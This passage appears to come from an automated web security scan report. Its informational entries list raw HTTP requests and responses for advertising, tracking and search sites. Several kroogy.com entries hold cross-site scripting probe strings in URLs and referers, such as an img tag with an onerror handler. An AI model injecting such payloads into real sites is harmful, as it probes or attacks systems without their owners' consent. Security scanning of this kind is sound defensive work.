Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 409
pragma: no-cache
Via: 1.1 mdw061001 (MII-APC/1.6)
Content-Length: 2174

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...

32.44. http://cdn.w55c.net/i/0RphY9og2j_721933665.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RphY9og2j_721933665.html

Request

GET /i/0RphY9og2j_721933665.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676420&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658420103&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303658420112&frm=1&adk=513358139&ga_vid=35710902.1303658420&ga_sid=1303658420&ga_hid=969894465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:33 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 30 Mar 2011 19:16:28 GMT
Date: Sun, 24 Apr 2011 15:19:52 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 419

<iframe src="http://altfarm.mediaplex.com/ad/fm/3992-125865-29115-2?mpt=[CACHEBUSTER]&mpvc=" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor="
...[SNIP]...

32.45. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RuFuATqDZ_452086828.html

Request

GET /i/0RuFuATqDZ_452086828.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_igAAwGsK5TqKJzYiJ8PEWQEBkOCrFi1HVQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZwU0VZRzVFdQ&ciu=MFJ1RnVBVHFEWg&reqid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjc&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=850&zc=NzUyMDc&v=0&s=http%3A%2F%2F& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381022&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658381041&frm=1&adk=513358139&ga_vid=971996930.1303658381&ga_sid=1303658381&ga_hid=548328206&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=33895132&fu=4&ifi=1&dtd=27
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:19:39 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 11 Apr 2011 19:58:56 GMT
Date: Sun, 24 Apr 2011 15:17:54 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 731

<iframe id='a22bf83a' name='a22bf83a' src='http://d.w55c.net/afr.php?zoneid=768&amp;cb=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYX
...[SNIP]...

32.46. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.39779967732526683 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21

Response

HTTP/1.1 500 Internal Server Error
Server: ZEDO 3G
Content-Length: 157
Content-Type: text/html
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:46 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:None:None:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1574B809,204731|0,1,1;expires=Tue, 24 May 2011 16:46:46 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=9lO0TcGt89aSPx9eFv62EiFe~042411;expires=Wed, 21 Apr 2021 16:46:46 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=215
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:46:47 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

32.47. http://de.swisscom.ch/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.swisscom.ch
Path:   /

Request

GET / HTTP/1.1
Host: de.swisscom.ch
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Zeus
Date: Sun, 24 Apr 2011 18:49:43 GMT
Content-Type: text/html
Content-Length: 416

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Refresh" content="0; url=http://de.swisscom.ch/privatkunden">
<sc
...[SNIP]...

32.48. http://dm.de.mookie1.com/2/B3DM/RTB/11325065670@x24  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/11325065670@x24

Request

GET /2/B3DM/RTB/11325065670@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:26:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 140
Content-Type: text/html

<script>
var ZT4_url='//matcher.bidder7.mookie1.com/zap?aid=10000183&sid=148';
var ZT4Pixel=new Image();
ZT4Pixel.src=ZT4_url;
</script>

32.49. http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/11377797616@x24

Request

GET /2/B3DM/RTB/11377797616@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:23:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 140
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/;httponly

<script>
var ZT4_url='//matcher.bidder7.mookie1.com/zap?aid=10000183&sid=148';
var ZT4Pixel=new Image();
ZT4Pixel.src=ZT4_url;
</script>

32.50. http://dm.de.mookie1.com/2/B3DM/RTB/12132898267@x24  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/12132898267@x24

Request

GET /2/B3DM/RTB/12132898267@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:26:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 140
Content-Type: text/html

<script>
var ZT4_url='//matcher.bidder7.mookie1.com/zap?aid=10000183&sid=148';
var ZT4Pixel=new Image();
ZT4Pixel.src=ZT4_url;
</script>

32.51. http://dogtime.com/ads/dtm/tp_support.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dogtime.com
Path:   /ads/dtm/tp_support.html

Request

GET /ads/dtm/tp_support.html HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: dogtime.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 24 Apr 2011 16:45:58 GMT
Content-Type: text/html
Last-Modified: Thu, 21 Apr 2011 18:38:35 GMT
Connection: keep-alive
Content-Length: 680

<html>
<head><title>DTM TP</title></head>
<body>
<!-- Advertiser 'Online Media Diva', Include user in segment 'OMD_Retarget' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.yieldman
...[SNIP]...

32.52. http://equifax.com/free30daytrial/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://equifax.com
Path:   /free30daytrial/

Request

GET /free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA HTTP/1.1
Host: equifax.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hbx.hc2=CJ; hbx.hc3=null; hbx.timestamp=1303614816593

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 19:53:06 GMT
Content-length: 13111
Content-type: text/html
Last-modified: Wed, 30 Mar 2011 22:21:05 GMT
Etag: "3337-4d93acd1"
Accept-ranges: bytes

<!DOCTYPE html>

<html lang="en">
<head>
<!-- META -->
<meta charset="utf-8">
<meta name="author" content="Equifax" />
<meta name="copyright" content="Equifax" />
<meta name="descripti
...[SNIP]...

32.53. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 24 Apr 2011 12:09:48 GMT
Expires: Sun, 24 Apr 2011 12:09:48 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2284

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><script>(function(){var e=(new Date).getTime();var f=function(a,b){var c=document.crea
...[SNIP]...

32.54. http://kroogy.com/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /N

Request

GET /N HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303653223.4.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index/index.php; __utma=221607367.144172721.1303647943.1303652987.1303653223.4

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2080

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...

32.55. http://kroogy.com/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /a

Request

GET /a HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/favicon.icof4c9e%3Cimg%20src%3da%20onerror%3dalert(%22DORK%22)%3E0d6ca5ff0dc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303653223.1303658380.5; __utmc=221607367; __utmb=221607367.4.10.1303658380

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:20:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2080

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...

32.56. http://kroogy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2090

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...

32.57. http://kroogy.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index.php

Request

GET /index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303653223.4.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index/index.php; __utma=221607367.144172721.1303647943.1303652987.1303653223.4

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2113

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...

32.58. http://kroogy.com/index/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/N

Request

GET /index/N HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/index/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303653223.4.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index/index.php; __utma=221607367.144172721.1303647943.1303652987.1303653223.4

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2071

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...

32.59. http://kroogy.com/index/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/index.php

Request

GET /index/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303653223.4.2.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index/index.php; __utma=221607367.144172721.1303647943.1303652987.1303653223.4

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2113

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...

32.60. http://kroogy.com/index/livesearch&q=s&type=web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=s&type=web

Request

GET /index/livesearch&q=s&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:32 GMT
Server: Apache/2.2.3 (CentOS)
